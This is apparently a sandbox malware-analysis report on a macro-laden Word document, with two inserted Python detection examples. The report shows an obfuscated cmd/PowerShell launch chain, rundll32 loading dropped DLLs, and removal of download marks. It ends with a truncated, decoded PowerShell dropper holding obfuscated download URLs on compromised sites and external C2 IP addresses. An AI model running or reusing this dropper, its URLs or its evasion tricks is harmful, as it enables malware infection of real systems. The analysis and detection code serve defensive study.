                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZ
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzU
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZ
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFY
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRae
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2099358220.000000001B830000.00000002.00000001.sdmp
                      Source: 79a2gzs3gkk.doc | Initial sample: OLE summary subject = Central ROI payment Planner Money Market Account azure Metal value-added Latvia next-generation algorithm

                      Data Obfuscation:

                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: 79a2gzs3gkk.doc | Stream path 'Macros/VBA/X1bqz0qaer43b52bf': High number of GOTO operations
                      Source: VBA code instrumentation | OLE, VBA macro, High number of GOTO operations: Module X1bqz0qaer43b52bf, Name: X1bqz0qaer43b52bf
                      Document contains an embedded VBA with many string operations indicating source code obfuscation
                      Source: 79a2gzs3gkk.doc | Stream path 'Macros/VBA/X1bqz0qaer43b52bf': High number of string operations
                      Source: VBA code instrumentation | OLE, VBA macro, High number of string operations: Module X1bqz0qaer43b52bf, Name: X1bqz0qaer43b52bf
                      Obfuscated command line found
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Suspicious powershell command line found
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
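The three command-line findings above (caret-obfuscated cmd.exe, -enc PowerShell, rundll32 called by ordinal) are what a triage script has to normalise before any rule can match them. The following is an added example, not part of the Joe Sandbox report and not Emotet's code: it undoes cmd.exe caret escaping, decodes the -EncodedCommand argument (base64 of UTF-16LE), and flags rundll32 invocations that use an ordinal export, load a module from a user profile, or load a module with a non-DLL extension. Because the report elides the real base64 blob, the sample uses a constructed stand-in ("SQBFAFgA", which decodes to "IEX"); the explorer.exe control event is constructed too. The check on an "unknown" parent reflects the report's own rendering of the cmd.exe launch: a process created through WMI Win32_Process::Create is parented by WmiPrvSE.exe on a live host rather than by WINWORD.EXE, so rules keyed on an Office parent miss this chain.

```python
import base64
import ntpath
import re

# Constructed sample modelled on the "Process created" lines of the report, as (parent, command line).
# The report elides the base64 after -enc; "SQBFAFgA" is a constructed stand-in (UTF-16LE "IEX").
# "unknown" is how the report labels a parent it could not attribute; a process created through WMI
# Win32_Process::Create is parented by WmiPrvSE.exe on a live host, not by WINWORD.EXE.
SAMPLE_EVENTS = [
    ("unknown",
     "cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. "
     "& p^owe^rs^he^ll^ -w hi^dd^en -^e^nc SQBFAFgA"),
    ("C:\\Windows\\System32\\cmd.exe", "powershell -w hidden -enc SQBFAFgA"),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "'C:\\Windows\\system32\\rundll32.exe' C:\\Users\\user\\Snuvw2w\\V4651pz\\H64C.dll AnyString"),
    ("C:\\Windows\\SysWOW64\\rundll32.exe",
     "C:\\Windows\\SysWOW64\\rundll32.exe 'C:\\Users\\user\\Snuvw2w\\V4651pz\\H64C.dll',#1"),
    ("C:\\Windows\\SysWOW64\\rundll32.exe",
     "C:\\Windows\\SysWOW64\\rundll32.exe 'C:\\Windows\\SysWOW64\\Psyzc\\rrjb.eew',FkNpAoTRbYmZ"),
    # constructed benign control: a Control Panel launch through rundll32 from Explorer
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\rundll32.exe shell32.dll,Control_RunDLL"),
]

# -EncodedCommand and its common abbreviations, followed by a base64 blob
_ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
# rundll32 <module>,#<ordinal>
_ORDINAL_RE = re.compile(r"(?i)rundll32(?:\.exe)?['\"]?\s+['\"]?[^,]+,\s*#\d+")
# first argument to rundll32: the module path, surrounding quotes stripped
_MODULE_RE = re.compile(r"(?i)rundll32(?:\.exe)?['\"]?\s+['\"]?([^'\",\s]+)")
_HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
_DLL_EXTS = {".dll", ".cpl", ".ocx", ".drv", ".ax"}
# "unknown" is the report's label; WmiPrvSE.exe is what a live host shows for WMI-created processes
_WMI_PARENTS = {"unknown", "c:\\windows\\system32\\wbem\\wmiprvse.exe"}


def de_caret(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: '^X' is the literal character X, so 'p^ow^er' becomes 'power'."""
    out, i = [], 0
    while i < len(cmdline):
        if cmdline[i] == "^" and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 2
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of a UTF-16LE script; restore padding and decode."""
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


def analyze_event(parent: str, cmdline: str) -> dict:
    """Normalise one process-creation event and return the findings as a list of tags."""
    tags, decoded = [], None
    norm = de_caret(cmdline)
    if cmdline.count("^") >= 3:          # carets are meaningless inside the words they split
        tags.append("caret_obfuscation")
    m = _ENC_RE.search(norm)
    if m:
        tags.append("encoded_powershell")
        try:
            decoded = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            decoded = None               # not valid base64/UTF-16; the flag still stands
    if _HIDDEN_RE.search(norm):
        tags.append("hidden_window")
    if "rundll32" in norm.lower():
        if _ORDINAL_RE.search(norm):
            tags.append("rundll32_ordinal_export")
        mod = _MODULE_RE.search(norm)
        if mod:
            module = mod.group(1)
            if ntpath.splitext(module)[1].lower() not in _DLL_EXTS:
                tags.append("rundll32_nonstandard_extension")
            if module.lower().startswith("c:\\users\\"):
                tags.append("rundll32_module_in_user_profile")
    if parent.lower() in _WMI_PARENTS:
        tags.append("unattributed_or_wmi_parent")
    return {"parent": parent, "normalized": norm, "tags": tags, "decoded": decoded}


def triage(events):
    """Run analyze_event over (parent, cmdline) pairs and keep only the events that raised a tag."""
    return [r for r in (analyze_event(p, c) for p, c in events) if r["tags"]]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["tags"], "|", hit["normalized"][:80], "|", hit["decoded"])
```

The de-careted form is the one to match rules against: the caret variants of "powershell" are unbounded, the normalised string is not. Ordinal calls (",#1") and random export names ("FkNpAoTRbYmZ") are both unusual for legitimate rundll32 use, which almost always names a documented export such as Control_RunDLL.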
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0014FED0 push edx; ret 7_2_0014FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00131155 push ecx; ret 7_2_00131156
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_001321EC pushad ; ret 7_2_00132200
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00133391 push eax; iretd 7_2_001333AE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00130C18 pushfd ; retf 7_2_00130C19
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_001317A1 push ds; iretd 7_2_001317A5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0019FED0 push edx; ret 8_2_0019FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00181155 push ecx; ret 8_2_00181156
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001821EC pushad ; ret 8_2_00182200
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00183391 push eax; iretd 8_2_001833AE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00180C18 pushfd ; retf 8_2_00180C19
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001817A1 push ds; iretd 8_2_001817A5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0020FED0 push edx; ret 9_2_0020FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001F1155 push ecx; ret 9_2_001F1156
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001F21EC pushad ; ret 9_2_001F2200
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001F3391 push eax; iretd 9_2_001F33AE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001F0C18 pushfd ; retf 9_2_001F0C19
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001F17A1 push ds; iretd 9_2_001F17A5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0011FED0 push edx; ret 10_2_0011FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00101155 push ecx; ret 10_2_00101156
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_001021EC pushad ; ret 10_2_00102200
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00103391 push eax; iretd 10_2_001033AE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00100C18 pushfd ; retf 10_2_00100C19
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_001017A1 push ds; iretd 10_2_001017A5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0018FED0 push edx; ret 11_2_0018FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00171155 push ecx; ret 11_2_00171156
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001721EC pushad ; ret 11_2_00172200
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00173391 push eax; iretd 11_2_001733AE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_00170C18 pushfd ; retf 11_2_00170C19
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_001717A1 push ds; iretd 11_2_001717A5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0012FED0 push edx; ret 12_2_0012FFD4

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Psyzc\rrjb.eew:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs:Zone.Identifier read attributes | delete
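The six events above are the loader opening the Zone.Identifier alternate data stream of each dropped copy with delete access. That stream is the Mark-of-the-Web a browser or mail client writes on download (an INI-style [ZoneTransfer] section with ZoneId=3 for the Internet zone); removing it makes the file look locally created, so SmartScreen and Office Protected View no longer treat it as downloaded. The following added example, not taken from the report or from Joe Sandbox, parses that stream format and classifies file-open events on it. The stream content, the explorer.exe control event and the exemption for explorer.exe (which removes the stream when a user clicks Unblock) are assumptions of the example.

```python
import ntpath

# Constructed sample: the six Zone.Identifier events from the report plus one constructed benign
# control, as (process, opened path, requested access).
SAMPLE_FILE_EVENTS = [
    ("C:\\Windows\\SysWOW64\\rundll32.exe", "C:\\Windows\\SysWOW64\\Psyzc\\rrjb.eew:Zone.Identifier", "read attributes | delete"),
    ("C:\\Windows\\SysWOW64\\rundll32.exe", "C:\\Windows\\SysWOW64\\Zeompoyzkid\\lbzryxyiwk.tgo:Zone.Identifier", "read attributes | delete"),
    ("C:\\Windows\\SysWOW64\\rundll32.exe", "C:\\Windows\\SysWOW64\\Fzcbciyn\\hrzxfeb.tjx:Zone.Identifier", "read attributes | delete"),
    ("C:\\Windows\\SysWOW64\\rundll32.exe", "C:\\Windows\\SysWOW64\\Jbfsrfqgbfhitpby\\uwgzghumsjobone.nsu:Zone.Identifier", "read attributes | delete"),
    ("C:\\Windows\\SysWOW64\\rundll32.exe", "C:\\Windows\\SysWOW64\\Ktcrhcwi\\dlsvvuq.xcm:Zone.Identifier", "read attributes | delete"),
    ("C:\\Windows\\SysWOW64\\rundll32.exe", "C:\\Windows\\SysWOW64\\Lpubpgqoe\\ouvofhit.lrs:Zone.Identifier", "read attributes | delete"),
    # constructed benign control: Explorer reading the stream of a download to decide on the MOTW prompt
    ("C:\\Windows\\explorer.exe", "C:\\Users\\user\\Downloads\\invoice.doc:Zone.Identifier", "read attributes | read data"),
]

# Constructed example of what a browser writes into the stream on download.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\nZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/\r\nHostUrl=https://example.invalid/invoice.doc\r\n"
)

# URLZONE values as used in ZoneId
URL_ZONES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites", 3: "Internet", 4: "RestrictedSites"}

# Assumption: Explorer is the one process expected to delete the stream (the Unblock button).
_ALLOWED_UNBLOCKERS = {"explorer.exe"}


def parse_zone_identifier(text: str) -> dict:
    """Parse a Zone.Identifier stream; returns the [ZoneTransfer] keys, with ZoneId as int plus its name."""
    section, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "zonetransfer" and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    if "ZoneId" in fields:
        fields["ZoneId"] = int(fields["ZoneId"])
        fields["ZoneName"] = URL_ZONES.get(fields["ZoneId"], "Unknown")
    return fields


def split_stream(path: str):
    """Split 'file:stream' into (file, stream). The drive-letter colon is not a stream separator."""
    base, sep, stream = path.rpartition(":")
    if not sep or "\\" in stream or len(base) <= 1:
        return path, None
    return base, stream


def classify_ads_event(process: str, path: str, access: str) -> dict:
    """Tag a file-open event on a Zone.Identifier stream; other streams or plain files get no tags."""
    file_path, stream = split_stream(path)
    tags = []
    if stream is None or stream.lower() != "zone.identifier":
        return {"file": file_path, "stream": stream, "tags": tags}
    access_set = {a.strip().lower() for a in access.split("|")}
    if "delete" in access_set and ntpath.basename(process).lower() not in _ALLOWED_UNBLOCKERS:
        tags.append("motw_stream_delete")            # the mark is being removed, not read
    if file_path.lower().startswith("c:\\windows\\"):
        tags.append("marked_file_under_systemroot")  # downloaded content should not land in %SystemRoot%
    return {"file": file_path, "stream": stream, "tags": tags}


if __name__ == "__main__":
    print(parse_zone_identifier(SAMPLE_STREAM))
    for ev in SAMPLE_FILE_EVENTS:
        print(classify_ads_event(*ev))
```

On a live host the same check runs over Sysmon or ETW file-create events: a non-Explorer process opening `*:Zone.Identifier` with DELETE access, or a file under %SystemRoot% that still carries a ZoneId=3 mark, is worth an alert on its own.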
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: 79a2gzs3gkk.doc | Stream path 'word' entropy: 7.92981016152 (max. 8.0)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2296 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000A823 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory protected: page execute read | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 195.159.28.230 144
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 69.38.130.14 80
                      Encrypted powershell cmdline option found
                      Source: unknown | Process created: Base64 decoded SeT-vARiaBLe ("T4"+"Kd6") ( [Type]("{2}{3}{5}{0}{4}{1}" -F 're','rY','SY','sTe','ctO','m.Io.DI') ); SEt 428 ( [TYpe]("{3}{7}{0}{5}{6}{2}{4}{8}{1}"-f'EM.nET.','er','t','SYs','M','sERViCE','PoIN','t','aNag')) ; $Jrnzmks=$A16L + [char](33) + $Y11F;$M20M=('O1'+'8W'); (IteM ("VArIABlE:T4k"+"D"+"6") ).vAlUe::"CreAT`EdIReCt`Ory"($HOME + (('{0}'+'Snuvw2w{0'+'}V'+'46'+'51pz{0'+'}') -F[CHar]92));$E20V=(('B1'+'3')+'A'); $428::"sEcu`R`ityP`R`OTocol" = (('T'+'ls1')+'2');$E_9Q=(('G'+'91')+'N');$Wsxw52z = ('H'+('64'+'C'));$L04N=('V'+('16'+'F'));$Xdn5xhg=$HOME+(('{0}Snuvw'+'2w{0}V'+('465'+'1p')+'z{0}')-F[CHar]92)+$Wsxw52z+'.d' + 'll';$X28G=('W0'+'1E');$O338_77='h' + 'tt' + 'p';$Xap1lma=('x'+' '+('['+' sh b:'+'//')+('co'+'wor')+('k'+'ingpl')+'us'+'.'+('es'+'/w')+('p-a'+'dmin'+'/Fxm')+('ME'+'/')+'!'+'x'+' ['+' '+'sh'+(' b'+':'+'//silk'+'o')+('nbu'+'si')+'ne'+('ss.'+'m')+'a'+('t'+'rixin'+'fotec'+'hsoluti')+('on.c'+'o')+'m'+('/'+'js')+('/'+'q26')+('/!'+'x [')+' '+'sh'+(' b'+'s:/')+'/'+('bbj'+'u')+('gu'+'eter'+'ia')+('.com'+'/s6k')+('sc'+'x')+'/'+'Z'+('/!'+'x')+' ['+' '+'s'+('h'+' '+'bs:/')+'/'+('ww'+'w')+'.b'+'i'+'m'+'ce'+'p'+'ti'+('on.c'+'o')+('m/w'+'p-admin/sHy'+'5t/'+'!x ['+' '+'s'+'h b://armak')+'on'+('ar'+'ms.'+'c')+'o'+'m/'+'w'+('p-i'+'n')+('clu'+'de'+'s/fz/'+'!')+'x '+('['+' s')+('h'+' b:/'+'/al')+('u'+'g'+'rama.c')+('om'+'.')+'m'+'x'+'/'+'t/'+('2/!x'+' '+'[ sh')+(' b'+':')+('/'+'/ho')+'me'+('cass.co'+'m/'+'wp')+('-c'+'ont')+('ent'+'/iF'+'/'))."Re`Pl`ACe"(('x '+('[ sh'+'
